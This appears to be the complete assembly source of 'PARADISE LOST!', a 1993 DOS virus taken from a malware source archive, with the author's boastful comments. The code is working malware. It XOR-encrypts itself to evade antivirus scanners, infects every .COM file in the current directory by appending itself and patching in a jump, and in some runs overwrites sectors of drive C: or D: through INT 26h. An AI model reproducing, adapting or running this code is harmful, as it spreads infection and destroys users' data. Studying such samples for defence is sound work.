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https://github.com/vxunderground/MalwareSourceCode.git
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243 lines
8.1 KiB
NASM
243 lines
8.1 KiB
NASM
; VirusName : PARADISE LOST!
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; Origin : Sweden
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; Author : The Unforgiven
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; Date : 20/12/93
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; This is a "mutation", of Tormentor's .COM lession. I've modified
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; some stuffs, but since I liked the .EXE infector better, I didn't
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; cared too much about this one.
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; Anyway, this is a non-resident current directory (yuck!), infector
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; of .COM programs. It've added a encryption routine, but it's nothing
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; really to scream hurray for.
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; It's also a bit destructive, well, it's 5% chance at each run, that
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; one of drive c: or d: gets kinda phucked up. This routine was as
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; usual "stolen" from Nowhere Man of NuKE. I must admit I like it!
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; Scan/MSAV/CPAV and F-prot can't find as usual find shits! I think
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; that ThunderByte AntiVirus heurtistic scanner found the infected
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; files as "probably/possible" infected, I really dunno, you try it
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; out by your self!
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; "We do not live forever, but mind never leaves our souls." (Dark Image).
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;=============================================================================
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; **** PARADISE LOST! ****
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;=============================================================================
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.model tiny
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.radix 16
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.code
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Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
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org 100
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dummy_code: db 'M' ; Mark file as infected.
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db 3 DUP(90) ; This is to simulate a infected prog.
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; Not included in virus-code.
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Virus_Start: call where_we_are ; Now we call the next bytes, just to
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; F-prot founded the 'lession -1'virus here in the unencrypted area, but by
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; simple add the push si, and the extra pop, it compleatele screwed up, and
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; couldn't found it as nothing!, HA! Eat dust, looser!
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where_we_are: push si
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pop si ; Since the virus-code's address will
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pop si
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;-----------------------------------------------------------------------
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; Now we have to put back the original 4 bytes in the host program, so
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; we can return control to it later:
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add si,_4first_bytes-where_we_are
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mov di,100
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cld
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movsw
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movsw
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;------------------------------------------------------------------------
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; We have to use SI as a reference since files differ in size thus making
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; virus to be located at different addresses.
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sub si,_4first_bytes-Virus_Start+4
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call encrypt_decrypt ; differ from victim to victim.
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jmp encryption_start ; a POP SI after a call will give us the
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; address which equals to 'where_we_are'
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; Very important.
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write_virus:
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call encrypt_decrypt
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mov ah,40 ; Append file with virus code.
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mov cx,offset Virus_Lenght
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mov dx,si ; Virus_Lenght.
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int 21
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call encrypt_decrypt
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ret
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encryption_value dw 0
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encrypt_decrypt:
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mov di,offset encryption_start-virus_start
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add di,si
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mov cx,(end_of_encryption-encryption_start+1)/2
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push bx
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mov bx,offset encryption_value-virus_start
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add bx,si
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mov dx,word ptr [bx]
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pop bx
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again:
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xor word ptr cs:[di],dx
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add di,2
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loop again
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ret
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;------------------------------------------------------------------------
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; Now we just have to find victims, we will look for ALL .COM files in
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; the current directory.
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encryption_start:
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;set_dta:
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mov ah,1ah
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lea dx,[si+offset dta-virus_start]
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int 21h
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mov ah,4e ; We start to look for a *.COM file
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look4victim: mov dx,offset file_match-Virus_Start
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add dx,si
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int 21
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jc no_victim_found
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; clear attribs: before open file
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mov ax,4301h
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xor cx,cx
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lea dx,[si+virus_end+1eh]
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int 21h
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mov ax,3d02 ; Now we open the file.
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lea dx,[si+offset DTA-virus_start+1eh] ;now also including
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int 21 ; DTA.
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jc cant_open_file ; If file couldn't be open.
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xchg ax,bx ; Save filehandle in bx
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; (we could use MOV BX,AX but we saves one byte by using xchg )
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mov ah,3f ; Now we read the first 4 bytes
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mov cx,4 ; from the victim -> buffer
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mov dx,offset _4first_bytes-Virus_Start
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add dx,si
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; We will then overwrite them with
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int 21 ; a JMP XXXX to virus-code at end.
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jc read_error
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cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
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jz sick_or_EXE ; Check if infected OR *.EXE
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; Almost all EXE files starts with 'M' and we mark the infected files by
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; starting with 'M' which equals to DEC BP
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; Now we just have to have one check instead of 2 (infected and *.EXE)
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mov ax,4202 ; Position file-pointer to point at
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xor cx,cx ; End-of-File.
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xor dx,dx ; Any writing to file will now APPEND it
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int 21 ; Returns AX -> at end.
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sub ax,4 ; Just for the JMP structure.
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mov word ptr ds:[_4new_bytes+2],ax
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; Build new JMP XXXX to virus.
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; ( logic: JMP AX )
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mov word ptr [si+encryption_value-virus_start],99 ; encryption_value.
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call write_virus
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;
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; mov ah,40 ; Append file with virus code.
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; mov cx,offset Virus_Lenght
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; mov dx,si ; Virus_Lenght.
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; int 21
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; jc write_error
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mov ax,4200 ; Position file-pointer to begin of file
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xor cx,cx ; So we can change the first 3 bytes
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xor dx,dx ; to JMP to virus.
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int 21
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mov ah,40 ; Write new 3 bytes.
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mov cx,4 ; After this, executing the file will
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mov dx,offset _4new_bytes-Virus_Start
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add dx,si
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; result in virus-code executing before
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int 21 ; original code.
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jc write_error
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; then close the file.
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mov ah,3e ; Close file, now file is infected.
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int 21 ; Dos function 3E (close handle)
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Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
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jmp look4victim ; find another victim...
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write_error: ; Here you can test whats went wrong.
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read_error: ; This is just for debugging purpose.
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cant_open_file: ; These entries are equal to eachother
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no_victim_found: ; but could be changed if you need to test something.
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; randomize:
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mov ah,2ch ;get a new random number
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int 21h ;5% chance of nuke
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cmp dl,5
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ja real_quit
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jmp which
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which:
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mov ah,2ch
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int 21h
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cmp dl,50
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ja nuke_c
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jmp nuke_d
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nuke_c:
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cli ;
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mov ah,2 ; 2=c:
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cwd ;
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mov cx,0100h ;
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int 026h ;
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JMP REAL_QUIT
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nuke_d:
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cli
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mov ah,3 ; 3=d:
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cwd
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mov cx,0100h
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int 026h
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jmp real_quit
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real_quit:
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mov ax,100 ; Every thing is put back in memory,
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push ax ; lets us RET back to start of program
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ret ; and execute the original program.
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notes db '[PARADIS LOST!] (c) 93 The Unforgiven/Immortal Riot'
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file_match db '*.COM',0 ; Pattern to search for.
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end_of_encryption:
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_4first_bytes: ret ; Here we save the 4 first org. bytes
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db 3 DUP(0)
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; We have a ret here since this file isn't a REAL infection.
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_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
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datestamp equ 24 ; Offset in DTA of file's date stamp
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timestamp equ 22 ; Offset in DTA of file's time stamp
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filename equ 30 ; Offset in DTA of ASCIIZ filename
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attribute equ 21 ; Offset in DTA of file attribute
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; so our virus-code will be run first.
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Virus_End EQU $
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dta db 42 DUP (?)
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end dummy_code
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